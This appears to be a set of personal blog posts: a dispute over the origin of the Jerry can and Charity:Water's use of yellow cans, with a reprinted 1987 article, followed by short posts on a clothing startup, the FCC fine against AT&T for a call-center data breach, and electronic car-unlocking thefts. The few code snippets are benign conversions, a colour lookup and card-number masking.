

The story behind the Jerry can

You may have heard a story about the Jerry can. Perhaps it goes something like this: Hitler was such a brilliant strategist that in 1936 he personally called on an engineer to create a nearly perfect fuel can, one we still use to this day.

As a student of history I find this story nearly impossible to accept; as a humanist, I find it a load of apologist nonsense about a genocidal maniac.

Why 1936, to begin with? Why did other countries take so long to follow? And how could Hitler’s grand supply-chain foresight three years before mobilizing for war with Poland fit into the many infamous Nazi fuel planning disasters that crippled the overall war effort?

No, Hitler wasn’t good at planning. No, Hitler wasn’t good at listening and adapting.

A more plausible story is that someone, probably a German soldier or mercenary assisting with Italian and Spanish fascist war campaigns in 1936, simply grew fed up with gas cans at a micro level. The WWI generation of fuel cans sucked for many reasons: they leaked, couldn’t be stacked, couldn’t pour without a mess, and couldn’t be carried in bulk.

I believe the archives should show this: from the summer to the fall of 1936, or maybe even earlier, German war management listened to field agents and decided something better was needed. Just like when the Nazis thought about putting radios in tanks for the first time, a decisive advantage in 1940, they also thought about motorized vehicle fuel supply.

It’s very likely some German soldier hated the inefficiency of the prior cans and borrowed from or collaborated with Italian and Spanish fascists to find a better one. I see no evidence this can was meant to be a macro strategy for fuel supply management, and plenty of evidence that Nazi fuel supply management overall was a disaster. The fact that a better can later proved instrumental in battle outcomes reflects grounded engineering, not strategic thought.

And so an engineer won a Nazi contract to design a better can on some rather obvious theory of improving durability and portability to increase availability of fuel. Quality of engineering and manufacturing still was high in Germany at that time, despite emigrations and arrests of talent; so the Jerry can was born from a pressed metal factory preparing the Nazi war machine.

Some suggest the can was a military secret. Of course 1936 was full of secrecy to help with propaganda hiding the re-militarization. Hitler was a pathological liar who ran misinformation campaigns, playing a victim card over and over again, making technology secrecy essential. This was a factor.

Even more of a factor was the reluctance of the Allies to listen to their field forces and incorporate feedback. Sending Sherman tanks into battle was an object lesson in fail-faster because high casualties were easy to count. Wasted fuel was harder to quantify. Unlike the Japanese, however, the Americans did adjust when they could see the need or advantage.

It turns out the Jerry can reached American hands in 1939, even before hostilities, thanks to its use at the Berlin airport (a German engineer stole three and shared the technology). The Allies’ delay in adopting it reflects their blindness to its value.

It took another four years because leadership of the Allies relied on statistical analysis and probably needed reports formatted with quantitative methods to make a change.

In 1942 an Allied soldier-chemist working on fuel logistics in northern Africa (facing conditions similar to what soldiers in the Italian and Spanish campaigns of 1935–36 might have seen) converted qualitative field reports (e.g. old cans suck) into a statistics-based cable to Washington (e.g. we’re losing 40% of fuel before it even gets to the vehicle).

The lesson here is listening to qualitative field reports can inspire innovation in design, and quantitative analysis can show how small and simple changes in efficiency can make a major difference.

I am all ears if someone can find a memo from Hitler calling for a better fuel can and reasons to stockpile. My guess is the design came far more organically from soldiers with a best guess on stocks from field observations during Spanish, Italian and Japanese fascist aggression, rather than any master plan.


The Story behind the yellow Jerry can used as a logo for Charity:Water

Once upon a time I sailed across the Pacific with the typical yellow fuel can lashed to the deck.

Although yellow cans have a specific meaning to me, one I thought was a standard because it is a safety issue, recently I came across a charity showing me smiling children next to yellow cans of water.

I was told yellow Jerry cans for water is something seen “everywhere”.

You’ve seen it everywhere on our site, at our events, on our shirts… tattooed on our arms… and although the Jerry can has become a mainstay for our staff and supporters, we want to let you know what it actually is and why it’s a symbol of the charity: water mission.

Yellow fuel can? I had to disagree. Yellow has always indicated danger to me: sickening fuel slick and fumes. Red cans, yellow cans. DO NOT DRINK. Regardless of continent or sea, I knew not to use the yellow cans when thirsty.

Confused by people asking for charity money? Me too.

I searched for why someone juxtaposed fuel cans with smiling happy children drinking clean water. Yellow cans seemed anything but appropriate for a “clean” anything. What is next, oil barrels?

So with that in mind I started reading and found some surprises on the charity website. Soon I became more concerned, not less.

You might say my opinion worsened as I read through a very strange and apologetic tone about “the German military” and their WWII leader:

Charity:Water Example one

To most people, this simple metal or plastic can means ‘gasoline,’ and rightfully so — the first Jerry cans were introduced as gasoline containers by the German military at the start of World War II.

False.

Jerry cans existed during the Spanish Civil War of 1936, years prior to the start of WWII. These cans served both as fuel and water containers, which we know because they were stamped with clear markings for their purpose.

Germany was involved with and supported other fascist militarism. Someone within the growing Nazi war machine was looking at how to improve a fuel can long before Hitler mobilized troops on 15 March 1938 (passive capitulation of Czechoslovakia) or 1 September 1939 (1.5 million marched into Poland, conquering 140 miles in just one week).

I believe the real story goes back to lessons in vehicle support and supply containers (e.g. evaporation/expansion) derived from the Italian invasion of Ethiopia (3 October 1935), and there is evidence the cans were modified or tested in the Spanish Civil War (17 July 1936).

Handling chemicals in extreme conditions had forced Italy and Spain to evolve their technology. For example the Italians had developed new mustard gas and new canisters to drop on Ethiopian hospitals flying the Red Cross (infamously killing Swedish medical leaders Fride Hylander and Gunnar Lundström).

The day called “darkest in the history of the International Red Cross” is worth reading if you want to get a sense of expanding conflict leading to a quickening pace of technology change in 1936.

Does the can mean gasoline? A phrase like “to most people” indicates some kind of data or source to check, yet none is provided.

I would say most people associate the Jerry can with a variety of fuels, not simply gasoline, and maybe even water. My data is based on search engine results (e.g. “Jerry Cans – Fuel, Water, Diesel, & Accessories” or “can be used for fuel and drinking water”).

We know 1930s Germany used gasoline for vehicles and yet their fuel cans were stamped with a generic word, Kraftstoff (fuel) instead. Perhaps today with yellow cans we are following in the design of the original Jerry can designers, who used unique symbols to differentiate the different fuels and water.

So to most people I think it fair to say the Jerry can means various liquids, not simply gasoline, and most people expect consistent symbols and use to avoid mixing them.

Charity:Water Example two

These five-gallon cans, also called ‘Jeep cans’ or ‘blitz cans’ (or, in Germany, ‘Wehrmachtskanisters’) were made of steel and usually sat in the back of vehicles as a reserve tank of gas.

Misleading.

Usually cans were strapped on the sides of Nazi vehicles (and later on the sides of Allied vehicles as well). Lashing the cans to the sides left the more controlled cargo space in back available for less durable or less convenient material, and also avoided a mess. We did the same on our boat when we crossed the ocean. Reserve cans were balanced on either side, not in the back.

The cans are 20L capacity (about 5.28 US gallons or 4.40 UK gallons).
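The capacity arithmetic is easy to check; a minimal sketch, assuming only the standard liters-per-gallon conversion factors:

```python
# Standard conversion factors (liters per gallon).
LITERS_PER_US_GALLON = 3.785411784
LITERS_PER_IMPERIAL_GALLON = 4.54609

capacity_l = 20.0  # Jerry can capacity in liters
us_gal = capacity_l / LITERS_PER_US_GALLON
uk_gal = capacity_l / LITERS_PER_IMPERIAL_GALLON

print(f"{us_gal:.2f} US gal, {uk_gal:.2f} UK gal")  # → 5.28 US gal, 4.40 UK gal
```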

The cans were steel yet what is more notable is how they incorporated a synthetic lining.

Also given that Jerry cans weren’t used by Jeeps until many years later I am not sure why Jeep cans is mentioned here. It strangely brands the can with a trademark of a specific American vehicle despite the cans not being developed for it originally and being used much more widely.

Blitz also is odd to mention. It means lightning in German and refers to a Nazi military campaign tactic. Although a German war reference could make sense at first glance, today “Blitz” is an American trademark on a can with significant engineering differences, which calls the label into question.

Originally in the 1940s a US company that made Jerry cans used the word “metal” in their name. They grew so large the vast majority of American fuel cans were made at this “metal” company. By the 1990s they had switched to making plastic cans. Their “metal” name was deprecated and replaced with a fuel can word associated with Nazis because, well, Oklahoma.

After changing its name to “Blitz” and changing production from metal to plastic the venerable American Jerry can manufacturer filed Chapter 11 during dozens of lawsuits over defective/explosive cans.

Charity:Water Example three

It’s said that Adolph Hitler anticipated the biggest challenge to taking over Europe in WWII was fuel supply. So Germany stocked up.

False and super annoying.

Look, this is very wrong for many reasons. I don’t expect to read charitable thoughts on Hitler from a supposed “charity” site. WTF. No really, WTF.

Also I find “it’s said” to be an unacceptable start to a pro-Hitler sentence that lacks any citation. Who said Hitler anticipated…what? Hitler was an insane dictator and deserves no glorifications. I should not need to cover this.

Nonetheless, it is easy to see how badly that fascist leader sucked at planning. The USAF points out he took his country to war with an acute fuel shortage and massive dependence on imports:

At the outbreak of the war, Germany’s stockpiles of fuel consisted of a total of 15 million barrels.

That is basically nothing, given their rate of consumption, and fuel was expected to run out by 1941. Fuel cans were not going to solve that challenge.

A Nazi official was surely eager to solve a part, an aspect of a fuel distribution problem, with a Jerry can. A pile or distribution of cans does not equate to solving massive supply issues, even if I accept it was the “biggest challenge”.

I mean of course fuel did not pose the “biggest challenge” to taking over Europe.

This claim is so absurd I don’t even know where to begin. Put it in reverse perspective: having solved the supply of fuel alone would not have won the war for the Axis. It was not the single deciding factor. It was a factor among many, with the other factors often being far more difficult.

A Hitler “anticipation” theory does not fit with Operation Barbarossa. Consider that more than 600,000 Nazi horses were relied upon in 1941 as fuel ran out, amid a lack of standardization, split and confused leadership, and overly optimistic ideas of a quick victory that undermined logistics and supply-chain efforts.

The simple fact is from June to December 1941 the result was “half-starved and half-frozen; out of fuel and ammunition.” It was the opposite of anticipation and stocking up early.

Charity:Water Example four

As Germany moved through Europe and North Africa, so did their thousands of gasoline cans. These cans proved to be dependable and durable; soon, countries all over the world were adapting them to haul and store liquids, coining them ‘Jerry cans’ because of their German origin (‘Jerry’ was a snide name for a German WWII soldier). New water container designs emerged but nothing could top the strength and simplicity of the original rectangular, X-marked Jerry can.

False.

Obviously there were more than thousands of cans. The discovery of the Jerry can did not lead directly to adoption by the Allies. I sense some odd reverence for Nazis, even to the point of trying to apologize for “snide” names.

“Jerry” was actually a term used by Allies during WWI supposedly because the German helmet resembled a British jerry (chamber pot).

Snide? Is this a concern without context? War against fascism, let alone against genocide, perhaps invites derision?

As far as “new water container” designs I must again point out the original Jerry can also was used for water, with a designated stamp on the can to differentiate from fuel cans.

Jerry can design innovations

Jerry cans improved greatly upon prior cans, yet are quite simple in retrospect — better durability and portability. This can be explained with a couple short stories from the Allied perspective.

Durability

Paul Pleiss was an American engineer in Berlin who had used the new cannister (see Appendix A below) and realized its benefits. From the summer of 1939 to the summer of 1940 he found it very difficult to make a case (pun not intended) to the US military. America was reluctant to improve container design until they were forced to study and realize shortcomings in their North Africa campaign.

Things really turned around in 1942 after qualitative field reports backed by quantitative evidence said nearly half of fuel in Egypt was lost due to can failure. Despite sizable effects recorded in desert battle outcomes in prior years (Wavell 1940, Auchinleck 1941, Montgomery 1942), for the US it was measured data that really hit home.

“…we sent a cable to naval officials in Washington stating that 40 percent of all the gasoline sent to Egypt was being lost through spillage and evaporation. We added that a detailed report would follow. The 40 percent figure was actually a guess intended to provoke alarm, but it worked. A cable came back immediately requesting confirmation.”

Six years after Italy’s campaign in Ethiopia influenced German thinking on cans, the US reached the same conclusions in North Africa.

Portability

The British appear to have ignored can design while Germany was innovating. At the start of WWII hostilities in 1939 the UK still issued a “flimsy” can. The better Jerry can design only came to light for them in 1940 as French General Gamelin’s troops withered, leaving Britain alone to fight the Germans. An over-extended and fragile but fast German blitzkrieg (lightning war) forced British study and realization: fuel portability could create a “Blitz” performance.

For example a can with a single handle is inferior to multiple handles when considering a line of soldiers trying to “bucket brigade”. Side handles meant two people could grab a can at the same time, or a single person could grab two with one hand. Faster can opening times mattered, as did less spillage during fuel transfer.

Put these British and American realizations together and you get what I believe to have been the context in November 1936 when Vinzenz Grünvogel of Müller applied for a German “Wehrmachtskanister” contract. An Italian campaign in Africa sparked the need for improvement, which then was tested in Spain. And speaking of context it seems also to be worth mentioning that there was prior “pressed material” collaboration between Müller and Ambi-Budd Presswerk. The Jerry can pressed design was a derivative more than a novelty.

With Italian tanks crossing Ethiopian territory in mind, here were the specifications:

Portability

  • 465mm tall
  • 340mm wide
  • 20L capacity
  • 4kg dry weight
  • easy to stack
  • easy to manufacture (two plates pressed)
  • easy to carry (one soldier = two full, four empty) +
    (two soldiers = three for bucket brigade speed of transfer)

Durability

  • shock (recessed welds)
  • corrosion (synthetic lining)
  • float (air pocket “bump”)
  • pour (short spout)
  • seal (cam with lock)
  • expand (50deg max)

From the list it should be easy to see why the design has lasted. Ultimately these cans were manufactured by dozens of Axis companies (Müller, Presswerke, Metalwerk, Nowack, Fischer, Schwelm, etc), not to mention by Allied companies after 1942.

Symbols and markings

Now take a minute to go back to the idea of contents. As I mentioned the Germans stamped cans with “Wasser” (water) or “Kraftstoff” (fuel). Despite a stamping process there also can be found a white W (Winterkraftstoff) on cans sent into the German campaigns. This reinforces that signage was evolving and a critical component. It also points again to a lack of overall planning and preparation mentioned above (Hitler apparently refused to believe war would last into winter).

And that brings me back to the yellow cans of today. How should cans with different contents safely be identified? Is there a standard? The answer is yes and no. Standards tend to evolve although generally they would go something like this.

Traditional

  1. Gasoline – Red
  2. Diesel – Yellow
  3. Drinking water (potable) – White
  4. Alt Fuels (Kerosene, JP Jet Fuel, Heli, M1 Meth, etc) – Blue
  5. Non-potable water – Green

Modern (e.g. 2005 California):

  1. Gasoline – red;
  2. Diesel – yellow; and
  3. Kerosene – blue
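For what it’s worth, the two conventions above reduce to a simple lookup. The table data comes straight from the lists; the function and its fallback message are my own hypothetical illustration:

```python
# Traditional can color convention, as listed above.
TRADITIONAL = {
    "red": "gasoline",
    "yellow": "diesel",
    "white": "potable water",
    "blue": "alternative fuels (kerosene, jet fuel, methanol)",
    "green": "non-potable water",
}

# Narrower modern convention (e.g. 2005 California).
CALIFORNIA_2005 = {
    "red": "gasoline",
    "yellow": "diesel",
    "blue": "kerosene",
}

def contents_for(color, scheme=TRADITIONAL):
    """Return the expected contents for a can color under a given scheme."""
    return scheme.get(color.lower(), "unknown -- do not assume safe to drink")

print(contents_for("yellow"))  # diesel
```

Note that under either scheme the safe default for an unrecognized color is the same: assume it is not drinking water.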

As far as I can tell Charity:Water uses yellow cans because of convenience, not safety or health. They give no good explanation other than that people in need already use diesel cans for water.

And that makes about as much sense as saying people in need already drink contaminated water so keep doing it.

It is not that I am opposed to redefining the colors. Here is a clever new version of white Jerry can contents.

My concern is the illogical position of pushing a global campaign to indicate clean water with the image taken from an Axis design and a global standard for dangerous/toxic liquid.

Starting from instinct, it seems counter-productive to the charity’s objective. Moving on to deeper analysis, the weak grasp of history suggests this may be a group divorced from reality and facts on the ground.

More on that…another day.


Appendix A

The Little Can That Could by Richard M. Daniel

Invention and Technology, Fall 1987, pp 60-64

During World War II the United States exported more tons of petroleum products than of all other war matériel combined. The mainstay of the enormous oil and gasoline transportation network that fed the war was the oceangoing tanker, supplemented on land by pipelines, railroad tank cars, and trucks. But for combat vehicles on the move, another link was crucial—smaller containers that could be carried and poured by hand and moved around a battle zone by trucks.

Hitler knew this. He perceived early on that the weakest link in his plans for blitzkrieg using his panzer divisions was fuel supply. He ordered his staff to design a fuel container that would minimize gasoline losses under combat conditions. As a result the German army had thousands of jerrycans, as they came to be called, stored and ready when hostilities began in 1939.

The jerrycan had been developed under the strictest secrecy, and its unique features were many. It was flat-sided and rectangular in shape, consisting of two halves welded together as in a typical automobile gasoline tank. It had three handles, enabling one man to carry two cans and pass one to another man in bucket-brigade fashion. Its capacity was approximately five U.S. gallons; its weight filled, forty-five pounds. Thanks to an air chamber at the top, it would float on water if dropped overboard or from a plane. Its short spout was secured with a snap closure that could be propped open for pouring, making unnecessary any funnel or opener. A gasket made the mouth leakproof. An air-breathing tube from the spout to the air space kept the pouring smooth. And most important, the can’s inside was lined with an impervious plastic material developed for the insides of steel beer barrels. This enabled the jerrycan to be used alternately for gasoline and water.

Early in the summer of 1939, this secret weapon began a roundabout odyssey into American hands. An American engineer named Paul Pleiss, finishing up a manufacturing job in Berlin, persuaded a German colleague to join him on a vacation trip overland to India. The two bought an automobile chassis and built a body for it. As they prepared to leave on their journey, they realized that they had no provision for emergency water. The German engineer knew of and had access to thousands of jerrycans stored at Tempelhof Airport. He simply took three and mounted them on the underside of the car.

The two drove across eleven national borders without incident and were halfway across India when Field Marshal Goering sent a plane to take the German engineer back home. Before departing, the engineer compounded his treason by giving Pleiss complete specifications for the jerrycan’s manufacture. Pleiss continued on alone to Calcutta. Then he put the car in storage and returned to Philadelphia.

Back in the United States, Pleiss told military officials about the container, but without a sample can he could stir no interest, even though the war was now well under way. The risk involved in having the cans removed from the car and shipped from Calcutta seemed too great, so he eventually had the complete vehicle sent to him, via Turkey and the Cape of Good Hope. It arrived in New York in the summer of 1940 with the three jerrycans intact. Pleiss immediately sent one of the cans to Washington. The War Department looked at it but unwisely decided that an updated version of their World War I container would be good enough. That was a cylindrical ten-gallon can with two screw closures. It required a wrench and a funnel for pouring.

That one jerrycan in the Army’s possession was later sent to Camp Holabird, in Maryland. There it was poorly redesigned; the only features retained were the size, shape, and handles. The welded circumferential joint was replaced with rolled seams around the bottom and one side. Both a wrench and a funnel were required for its use. And it now had no lining. As any petroleum engineer knows, it is unsafe to store gasoline in a container with rolled seams. This ersatz can did not win wide acceptance.

The British first encountered the jerrycan during the German invasion of Norway, in 1940, and gave it its English name (the Germans were, of course, the “Jerries”). Later that year Pleiss was in London and was asked by British officers if he knew anything about the can’s design and manufacture. He ordered the second of his three jerrycans flown to London. Steps were taken to manufacture exact duplicates of it.

Two years later the United States was still oblivious of the can. Then, in September 1942, two quality-control officers posted to American refineries in the Mideast ran smack into the problems being created by ignoring the jerrycan. I was one of those two. Passing through Cairo two weeks before the start of the Battle of El Alamein, we learned that the British wanted no part of a planned U.S. Navy can; as far as they were concerned, the only container worth having was the Jerrycan, even though their only supply was those captured in battle. The British were bitter; two years after the invasion of Norway there was still no evidence that their government had done anything about the jerrycan.

My colleague and I learned quickly about the jerrycan’s advantages and the Allied can’s costly disadvantages, and we sent a cable to naval officials in Washington stating that 40 percent of all the gasoline sent to Egypt was being lost through spillage and evaporation. We added that a detailed report would follow. The 40 percent figure was actually a guess intended to provoke alarm, but it worked. A cable came back immediately requesting confirmation.

We then arranged a visit to several fuel-handling depots at the rear of Montgomery’s army and found there that conditions were indeed appalling. Fuel arrived by rail from the sea in fifty-five-gallon steel drums with rolled seams and friction-sealed metallic mouths. The drums were handled violently by local laborers. Many leaked. The next link in the chain was the infamous five-gallon “petrol tin.” This was a square can of tin plate that had been used for decades to supply lamp kerosene. It was hardly useful for gasoline. In the hot desert sun, it tended to swell up, burst at the seams, and leak. Since a funnel was needed for pouring, spillage was also a problem.

Allied soldiers in Africa knew that the only gasoline container worth having was German. Similar tins were carried on Liberator bombers in flight. They leaked out perhaps a third of the fuel they carried. Because of this, General Wavell’s defeat of the Italians in North Africa in 1940 had come to naught. His planes and combat vehicles had literally run out of gas. Likewise in 1941, General Auchinleck’s victory over Rommel had withered away. In 1942 General Montgomery saw to it that he had enough supplies, including gasoline, to whip Rommel in spite of terrific wastage. And he was helped by captured jerrycans.

The British historian Desmond Young later confirmed the great importance of oil cans in the early African part of the war. “No one who did not serve in the desert,” he wrote, “can realise to what extent the difference between complete and partial success rested on the simplest item of our equipment—and the worst. Whoever sent our troops into desert warfare with the [five-gallon] petrol tin has much to answer for. General Auchinleck estimates that this ‘flimsy and ill-constructed container’ led to the loss of thirty per cent of petrol between base and consumer. … The overall loss was almost incalculable. To calculate the tanks destroyed, the number of men who were killed or went into captivity because of shortage of petrol at some crucial moment, the ships and merchant seamen lost in carrying it, would be quite impossible.”

After my colleague and I made our report, a new five-gallon container under consideration in Washington was canceled. Meanwhile the British were finally gearing up for mass production. Two million British jerrycans were sent to North Africa in early 1943, and by early 1944 they were being manufactured in the Middle East. Since the British had such a head start, the Allies agreed to let them produce all the cans needed for the invasion of Europe. Millions were ready by D-day. By V-E day some twenty-one million Allied jerrycans had been scattered all over Europe. President Roosevelt observed in November 1944, “Without these cans it would have been impossible for our armies to cut their way across France at a lightning pace which exceeded the German Blitz of 1940.”

In Washington little about the jerrycan appears in the official record. A military report says simply, “A sample of the jerry can was brought to the office of the Quartermaster General in the summer of 1940.”

Richard M. Daniel is a retired commander in the U.S. Naval Reserve and a chemical engineer.

Posted in Energy, History, Security.


Le Tote: Weather Prediction As Retail

So I’m walking down the street in SF today and someone steps out of a building in front of me. I’m always interested in what’s happening around me so naturally I ask if they work there. This person answers yes and says it’s a bunch of startups, including Le Tote.

“It’s like Netflix for clothes” I am told as a shopping bag is opened to reveal a box.

“We send you clothes we recommend you wear and…” I interrupt to finish the sentence “if you keep them you buy them! Am I right?” They nod yes and smile widely as if they were about to explain something hard and I saved a mountain of effort.

A pregnant moment arrives as I wait for even more congratulations, although I have really just described the age-old mail-order model as it currently exists. The irony of me predicting the end of a sentence, and pointing out a lack of innovation, is lost. They just seem relieved of the chore of explaining something aspiring to be innovative.

Maybe I shouldn’t attempt to find humor in analytics. I ask seriously if they have anything I should try.

“It’s only for women right now” I am told with a disapproving look.

I genuinely wonder out loud about their predictive algorithm: “Why do you assume already I do not want to wear women’s clothes? What if I am transgender? Would you still predict my fashion?”

I am looked at skeptically and offered no answers other than a soft and slow repeat of “if you want to wear women’s clothes…”.

Still curious, and since this person is still standing there (presumably at the mercy of a service, a late driver), I press for more. “Never mind gender fashion definitions, how does your prediction reflect regional differences? For example when someone in Colorado…” they interrupt me to say “we check the weather”.

Weather? Definitely not the end of sentence I had in mind.

I forgo jokes about the weather being perpetually wrong and instead restart my question so I can bring back my ending: “what do you do when someone in Colorado thinks sky-blue is the hot new color, while someone in SF wants orange and green? Can your algos anticipate fashion trends from social or other indicators, given your fashion angle”; tempted to add “not a good indicator of weather”.

Their face grows bright, they lean back, look to the street with an open gaze, suck in an ocean of air and exclaim “WOW WHAT A GREAT IDEA, I WILL SUGGEST THIS IDEA AT OUR NEXT MEETING”. Then they abruptly turn and excitedly run across the street waving a hand.

Now standing alone I yell “so what’s your name” towards the back of a head that nears an Uber parked in the bike lane. “Heather” is the response. Of course it is. And so I continue on my way.

Posted in Security.


Impostors in Your Call Center

As a PCI assessor I was often asked how to protect the personally identifiable information (PII) captured within audio recordings. Call centers, especially very large and distributed ones, tended to end up with giant archives of people talking about payment information. Packet capture systems such as intrusion detection or network forensics also tended to collect payment card data discussed over the network (e.g. on IP phones).

The bottom line (pun not intended) was that working with audio security is an interesting challenge and can add some flavor to the usual job of masking, replacing or encrypting stored data.
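As a toy illustration of the “masking” approach, here is a minimal sketch. The regex, the function name, and the sample input are my own hypothetical choices, not anyone’s production method; a real system would also apply a Luhn check to cut down on false positives such as long phone numbers.

```python
import re

# Match 13-16 digit runs that look like a payment card number,
# allowing the spaces or dashes people use when reading one aloud.
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,15}\d\b")

def mask_pans(text):
    """Replace candidate card numbers, keeping only the last four digits."""
    def _mask(match):
        digits = re.sub(r"[ -]", "", match.group(0))
        return "*" * (len(digits) - 4) + digits[-4:]
    return PAN_RE.sub(_mask, text)

print(mask_pans("Card number 4111 1111 1111 1111, thanks."))
# → Card number ************1111, thanks.
```

The same idea applies to transcripts generated from call recordings: mask before storage so the archive never holds the full PAN in the first place.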

And yet despite a body of knowledge in this area, leading to steady improvement in security tools to reduce fraud from audio data, we still see major disasters in the news. I believe this is not a failure of technology but rather a higher-level management issue: as with quality engineering, it can’t really be blamed on tools so much as on attention to detail.

Take for example AT&T, which has just been fined $25m by the FCC for three breaches:

In May 2014, the Enforcement Bureau launched its investigation into a 168-day data breach that took place at an AT&T call center in Mexico between November 2013 and April 2014. During this period, three call center employees were paid by third parties to obtain customer information — specifically, names and at least the last four digits of customers’ Social Security numbers — that could then be used to submit online requests for cellular handset unlock codes. The three call center employees accessed more than 68,000 accounts without customer authorization, which they then provided to third parties who used that information to submit 290,803 handset unlock requests through AT&T’s online customer unlock request portal.

One attack would be a problem. Three impostors are a sign of something far more troubling; management is not detecting or preventing active infiltration designed to bypass internal controls and steal valuable data. Organized crime still shows success at either coercing staff or implanting attackers in call centers to leak PII for financial gain. And if three impostors aren’t bad enough, the FCC goes on to document another forty individuals found stealing PII.

Kudos to the FCC for their investigation and subsequent action. I believe it is right for them to emphasize a top-level management approach as a solution.

The people who were caught in the act of stealing (the impostors themselves) will likely go to jail (as also happened in the recent Bechtel executive fraud case). New oversight needs to be forced by regulators at the top levels of company management so they pay better attention to impostors and other attackers stealing PII.

…AT&T will be required to improve its privacy and data security practices by appointing a senior compliance manager who is a certified privacy professional, conducting a privacy risk assessment, implementing an information security program, preparing an appropriate compliance manual, and regularly training employees on the company’s privacy policies and the applicable privacy legal authorities. AT&T will file regular compliance reports with the FCC.

Posted in Security.


Keeping Car Contents Safe From Electronic Key Thieves

Nick Bilton is a columnist for the New York Times (NYT). He published a story today called “Keeping Your Car Safe From Electronic Thieves” and I adapted my blog post title from his.

Perhaps you can see why I changed the title slightly from his version. Here are a couple reasons:

First, his story is about things inside a car being at risk, rather than the car itself being unsafe. Second, and more to the point, the “electronic thieves” are not stealing cars as much as opening doors and grabbing what is inside.

That second point is a huge clue to this story. If thieves were “cloning” a car key, making a duplicate, then I suspect we would see different behavior. Perhaps penalties for stealing cars are enough disincentive to keep thieves happy with stealing contents. But I doubt that. More likely is that this is a study in opportunity.

You could read the full article, or I suggest instead you just read his tweets on April 6th for a more interesting version of what led to the story (meant to be read from bottom to top, as Twitter would have you do):

Nick Bilton @nickbilton · Apr 6
@ejacqui It looks like it’s a broadcasts a bunch of signals to open the car lock. They cost about $100, apparently.
5 retweets 3 favorites

Nick Bilton @nickbilton · Apr 6
@seanbonner @gregcohn @tonx @sacca Fast-forward 10 years and thieves (or pranksters) will be doing this with our homes.
2 retweets 4 favorites

Nick Bilton @nickbilton · Apr 6
@tweets_amanda I tried. I ran after them, but they took off. The cops said it’s easy to get online, whatever “it” is.
0 retweets 1 favorite

Nick Bilton @nickbilton · Apr 6
@r2r @StevenLevy No. A Toyota Prius. Crazy how insecure this “technology” is.
1 retweet 1 favorite

Nick Bilton @nickbilton · Apr 6
@kevin2kelly Yep. Exactly. No broken window, and to a passerby it looks like the thief is in their own car. Scary stuff.
1 retweet 3 favorites

Nick Bilton @nickbilton · Apr 6
@StevenLevy Yep. I chased after them, not to tell them off, but to ask what technology they were using. :-)
4 retweets 24 favorites

Nick Bilton @nickbilton · Apr 6
@noneck Was watching out the window and saw them do it. (I then ran out and yelled at them, and they took off.)
1 retweet 1 favorite

Nick Bilton @nickbilton · Apr 6
@sacca Just did a little research & it’s insane how easy it is to get the device they used. Scary when you think about the connected home.
22 retweets 24 favorites

Nick Bilton @nickbilton · Apr 6
@Beaker A Toyota Prius. It was like watching someone slice into butter. That simple.
1 retweet 5 favorites

Nick Bilton @nickbilton · Apr 6
@schlaf I chased them down and thought, what’s the point. They’re kids. I really wanted to just ask them about the technology! :-)
3 retweets 22 favorites

Nick Bilton @nickbilton · Apr 6
@owen_lystrup Toyota Prius. Don’t get one. Buy an old 1970s car with a key. :-)
3 retweets 10 favorites

Nick Bilton @nickbilton · Apr 6
@trammell Yep. Literally just pressed a button and opened the door. It was bizarre and scary when you think about the “connected home”.
12 retweets 22 favorites

Nick Bilton @nickbilton · Apr 6
@SubBeck Yelled at them and called the cops. The cops sounded blaze by the whole situation.
2 retweets 4 favorites

Nick Bilton @nickbilton · Apr 6
@cowperthwait Toyota Prius. It’s insane that they can literally press a button and open the door.
23 retweets 16 favorites

Nick Bilton @nickbilton · Apr 6
@MatthewKeysLive Nothing; it’s empty. They’ve done it before when I wasn’t around. But I had no idea how they were doing it. Now I know.
3 retweets 5 favorites

Nick Bilton @nickbilton · Apr 6
Just saw 2 kids walk up to my LOCKED car, press a button on a device which unlocked the car, and broke in. So much for our keyless future.

To me there are some fingernails-on-chalkboard annoying tweets in that stream. Horrible attribution, for starters (pun not intended). He says don’t get a Toyota Prius because it must be their fault. Similarly he says our keyless future is over and we should buy something from the 1970s with a key. And then he goes on to attack the idea of a connected home.

This is all complete nonsense.

The attribution is wrong. The advice is wrong. Most of all, the fear of the future is wrong.

Consider that thieves leave a car essentially unharmed (unlike all the smash and grab behavior linked to economic/political issues). This tells us a lot about risk, methods and fixes. It means for example that insurance companies are not likely to be motivated for change. After all, no windows broken and no panels scratched or damaged means no real claims.

In this reporter’s case he even says nothing valuable was in the car. There’s nothing really to tell the police other than someone opened the door and closed it again. A thief who walks up, opens the door, and takes whatever they can from inside the car…this is an encryption/privacy expert’s worst nightmare. This is a lock being silently bypassed with something that amounts to a dreaded escrow or golden key. Given the current encryption debate about backdoors we might have a very interesting story on our hands.

THIS COULD HAVE BEEN A VERY POWERFUL AND PERSONAL STORY OF BEING VIOLATED BY WEAK KEY MANAGEMENT – HOW OUR SOCIETY HAS BEEN LET DOWN BY PRODUCT MANUFACTURERS WHO DON’T CARE ENOUGH ABOUT PROTECTION OF OUR ASSETS. Sadly the NYT entirely misses the significance of its own story.

Mind you I tried on April 8th to contact the reporter and add some of this perspective, to indicate the story is really about risk economics and a much broader debate on key management.

[Screenshot of my tweet to @nickbilton]

Unlike the (dare I say shallow) angle taken by the NYT as something “newsworthy”, a car lock bypass is not new to anyone who pays attention to security or to the mundane reports of people getting their cars broken into. That Winnipeg story I offered the reporter to calm him down is years old. There also were reports in London, Los Angeles and other major city news over the past years describing the same exact scenario and how police and car manufacturers weren’t eager to discuss solutions. The NYT reporter is essentially now stumbling into the same rut.

2013 reports actually followed 2012 news of cars being stolen and disappearing. My guess is the organized crime tools filtered down to the hands of petty criminals and eventually mischievous kids. There is far wider opportunity as motives soften and means become easier. The organization and operation required to fence a stolen car probably shifted first to joy rides, then shifted again to people grabbing contents of cars and eventually to people just curious about weak controls. The shifts happened over years and then, finally, a NYT reporter felt it personally and was rustled awake.

Apparently the NYT did not pay attention to the alarming (pun not intended) trend other reporters have put in their headlines. I did a quick search and found no mention by them before now. It does seem a bit like when crime happens to a NYT reporter the NYT cares much more about the story and frames it as very newsworthy and novel, if you know what I mean.

To really put it in perspective, nearly twenty years ago a colleague of mine had set a personal goal to invisibly open car doors in under five seconds. This is a real thing. He was averaging around seven seconds. General lock picking has since become a more widely known sport with open and popular competitions.

Anyone saying “so much for our keyless future” after this kind of incident arguably has no clue about security in the present let alone the future. Expressing frustration on Twitter turned into expressing frustration at the NYT, which leaves the reader hanging for some real risk analysis.

So that is why I say the real story here, similar to a key escrow angle missed by the reporter, is economics of a fix. Why doesn’t he take a hard look at the incentives and real barriers to build better keyless electronic systems?

